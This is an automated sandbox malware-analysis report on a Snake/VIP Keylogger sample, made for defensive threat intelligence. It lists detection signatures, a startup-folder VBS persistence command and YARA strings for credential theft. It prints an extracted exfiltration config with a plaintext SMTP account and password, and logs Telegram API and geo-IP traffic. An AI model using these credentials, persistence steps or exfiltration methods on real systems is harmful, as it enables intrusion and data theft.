Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6cicUo3f8g.exe

Overview

General Information

Sample name:6cicUo3f8g.exe
renamed because original name is a hash value
Original sample name:f800b332a02989cb73f92d0b58f9658f7f5389be1a966670c507ccbd32c31ce7.exe
Analysis ID:1588271
MD5:d721eab396039744df30c1c4ac89386e
SHA1:db06bcb42971088989f20c795e484611b37b35b0
SHA256:f800b332a02989cb73f92d0b58f9658f7f5389be1a966670c507ccbd32c31ce7
Tags:exeMassLoggeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 6cicUo3f8g.exe (PID: 3428 cmdline: "C:\Users\user\Desktop\6cicUo3f8g.exe" MD5: D721EAB396039744DF30C1C4AC89386E)
    • toggeries.exe (PID: 5916 cmdline: "C:\Users\user\Desktop\6cicUo3f8g.exe" MD5: D721EAB396039744DF30C1C4AC89386E)
      • RegSvcs.exe (PID: 1672 cmdline: "C:\Users\user\Desktop\6cicUo3f8g.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 6540 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\toggeries.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • toggeries.exe (PID: 2184 cmdline: "C:\Users\user\AppData\Local\Thebesian\toggeries.exe" MD5: D721EAB396039744DF30C1C4AC89386E)
      • RegSvcs.exe (PID: 7076 cmdline: "C:\Users\user\AppData\Local\Thebesian\toggeries.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2dca0:$a1: get_encryptedPassword
          • 0x2e228:$a2: get_encryptedUsername
          • 0x2d913:$a3: get_timePasswordChanged
          • 0x2da2a:$a4: get_passwordField
          • 0x2dcb6:$a5: set_encryptedPassword
          • 0x309d2:$a6: get_passwords
          • 0x30d66:$a7: get_logins
          • 0x309be:$a8: GetOutlookPasswords
          • 0x30377:$a9: StartKeylogger
          • 0x30cbf:$a10: KeyLoggerEventArgs
          • 0x30417:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 29 entries
          SourceRuleDescriptionAuthorStrings
          2.2.toggeries.exe.cd0000.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            2.2.toggeries.exe.cd0000.1.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              2.2.toggeries.exe.cd0000.1.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                2.2.toggeries.exe.cd0000.1.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2bea0:$a1: get_encryptedPassword
                • 0x2c428:$a2: get_encryptedUsername
                • 0x2bb13:$a3: get_timePasswordChanged
                • 0x2bc2a:$a4: get_passwordField
                • 0x2beb6:$a5: set_encryptedPassword
                • 0x2ebd2:$a6: get_passwords
                • 0x2ef66:$a7: get_logins
                • 0x2ebbe:$a8: GetOutlookPasswords
                • 0x2e577:$a9: StartKeylogger
                • 0x2eebf:$a10: KeyLoggerEventArgs
                • 0x2e617:$a11: KeyLoggerEventArgsEventHandler
                2.2.toggeries.exe.cd0000.1.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x3947e:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x38b21:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x38d7e:$a4: \Orbitum\User Data\Default\Login Data
                • 0x3975d:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 28 entries

                System Summary

                barindex
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\toggeries.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\toggeries.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\toggeries.vbs" , ProcessId: 6540, ProcessName: wscript.exe
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\toggeries.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\toggeries.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\toggeries.vbs" , ProcessId: 6540, ProcessName: wscript.exe

                Data Obfuscation

                barindex
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Thebesian\toggeries.exe, ProcessId: 5916, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\toggeries.vbs
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T23:19:18.688114+010028033053Unknown Traffic192.168.2.649728104.21.32.1443TCP
                2025-01-10T23:19:20.066545+010028033053Unknown Traffic192.168.2.649740104.21.32.1443TCP
                2025-01-10T23:19:26.879099+010028033053Unknown Traffic192.168.2.649794104.21.32.1443TCP
                2025-01-10T23:19:28.190658+010028033053Unknown Traffic192.168.2.649807104.21.32.1443TCP
                2025-01-10T23:19:33.598886+010028033053Unknown Traffic192.168.2.649841104.21.32.1443TCP
                2025-01-10T23:19:34.910911+010028033053Unknown Traffic192.168.2.649851104.21.32.1443TCP
                2025-01-10T23:19:40.191886+010028033053Unknown Traffic192.168.2.649893104.21.32.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T23:19:17.027297+010028032742Potentially Bad Traffic192.168.2.649716132.226.247.7380TCP
                2025-01-10T23:19:17.996068+010028032742Potentially Bad Traffic192.168.2.649716132.226.247.7380TCP
                2025-01-10T23:19:19.449161+010028032742Potentially Bad Traffic192.168.2.649734132.226.247.7380TCP
                2025-01-10T23:19:32.058579+010028032742Potentially Bad Traffic192.168.2.649826132.226.247.7380TCP
                2025-01-10T23:19:32.996111+010028032742Potentially Bad Traffic192.168.2.649826132.226.247.7380TCP
                2025-01-10T23:19:34.355465+010028032742Potentially Bad Traffic192.168.2.649845132.226.247.7380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T23:19:29.119581+010018100071Potentially Bad Traffic192.168.2.649811149.154.167.220443TCP
                2025-01-10T23:19:43.713922+010018100071Potentially Bad Traffic192.168.2.661868149.154.167.220443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}
                Source: 7.2.toggeries.exe.3700000.1.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeReversingLabs: Detection: 82%
                Source: 6cicUo3f8g.exeReversingLabs: Detection: 82%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeJoe Sandbox ML: detected
                Source: 6cicUo3f8g.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: 6cicUo3f8g.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49722 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49833 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49811 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:61868 version: TLS 1.2
                Source: Binary string: wntdll.pdbUGP source: toggeries.exe, 00000002.00000003.2199979057.0000000003810000.00000004.00001000.00020000.00000000.sdmp, toggeries.exe, 00000002.00000003.2198284042.0000000003670000.00000004.00001000.00020000.00000000.sdmp, toggeries.exe, 00000007.00000003.2351747095.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, toggeries.exe, 00000007.00000003.2353097903.0000000003940000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: toggeries.exe, 00000002.00000003.2199979057.0000000003810000.00000004.00001000.00020000.00000000.sdmp, toggeries.exe, 00000002.00000003.2198284042.0000000003670000.00000004.00001000.00020000.00000000.sdmp, toggeries.exe, 00000007.00000003.2351747095.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, toggeries.exe, 00000007.00000003.2353097903.0000000003940000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0094445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0094445A
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0094C6D1 FindFirstFileW,FindClose,0_2_0094C6D1
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0094C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0094C75C
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0094EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0094EF95
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0094F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0094F0F2
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0094F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0094F3F3
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_009437EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009437EF
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_00943B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00943B12
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0094BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0094BCBC
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B4445A GetFileAttributesW,FindFirstFileW,FindClose,2_2_00B4445A
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B4C6D1 FindFirstFileW,FindClose,2_2_00B4C6D1
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B4C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00B4C75C
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B4EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00B4EF95
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B4F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00B4F0F2
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B4F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00B4F3F3
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B437EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00B437EF
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B43B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00B43B12
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B4BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00B4BCBC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 010AF8E9h3_2_010AF631
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 010AFD41h3_2_010AFA88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05857A5Dh3_2_05857720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05858E28h3_2_05858B58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0585E856h3_2_0585E588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0585C866h3_2_0585C598
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05856869h3_2_058565C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 058518A1h3_2_058515F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05850FF1h3_2_05850D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05850741h3_2_05850498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov esp, ebp3_2_0585AC31
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov esp, ebp3_2_0585AC40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0585DF36h3_2_0585DC68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0585BF46h3_2_0585BC78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05855A29h3_2_05855780
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0585FA96h3_2_0585F7C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0585DAA6h3_2_0585D7D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0585BAB6h3_2_0585B7E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05852A01h3_2_05852758
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05852151h3_2_05851EA8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0585F176h3_2_0585EEA8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0585D186h3_2_0585CEB8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0585B196h3_2_0585AEC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05855179h3_2_05854ED0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 058548C9h3_2_05854620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05857119h3_2_05856E70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05851449h3_2_058511A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05854471h3_2_058541C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0585C3D6h3_2_0585C108
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05850B99h3_2_058508F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0585E3C6h3_2_0585E0F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 058532B1h3_2_05853008
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 058562DBh3_2_05856030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 058502E9h3_2_05850040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05852E59h3_2_05852BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05855E81h3_2_05855BD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 058525A9h3_2_05852300
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 058555D1h3_2_05855328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0585F606h3_2_0585F338
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0585D616h3_2_0585D348
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0585B626h3_2_0585B358
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05857571h3_2_058572C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05856CC1h3_2_05856A18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0585ECE6h3_2_0585EA18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0585CCF6h3_2_0585CA28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05851CF9h3_2_05851A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05854D21h3_2_05854A78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0089F8E9h8_2_0089F630
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0089FD41h8_2_0089FA88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FD31E0h8_2_05FD2DC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FD2C19h8_2_05FD2968
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FD0D0Dh8_2_05FD0B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FD1697h8_2_05FD0B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FDE501h8_2_05FDE258
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FD31E0h8_2_05FD2DBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FDDC51h8_2_05FDD9A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FDD7F9h8_2_05FDD550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FD31E0h8_2_05FD310E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FDD3A1h8_2_05FDD0F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FDCF49h8_2_05FDCCA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_05FD0853
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_05FD0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FDFAB9h8_2_05FDF810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FDF661h8_2_05FDF3B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FDF209h8_2_05FDEF60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FDEDB1h8_2_05FDEB08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FDE959h8_2_05FDE6B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_05FD0673
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05FDE0A9h8_2_05FDDE00

                Networking

                barindex
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49811 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:61868 -> 149.154.167.220:443
                Source: unknownDNS query: name: api.telegram.org
                Source: unknownDNS query: name: api.telegram.org
                Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.toggeries.exe.cd0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.toggeries.exe.3700000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: global trafficTCP traffic: 192.168.2.6:61842 -> 162.159.36.2:53
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
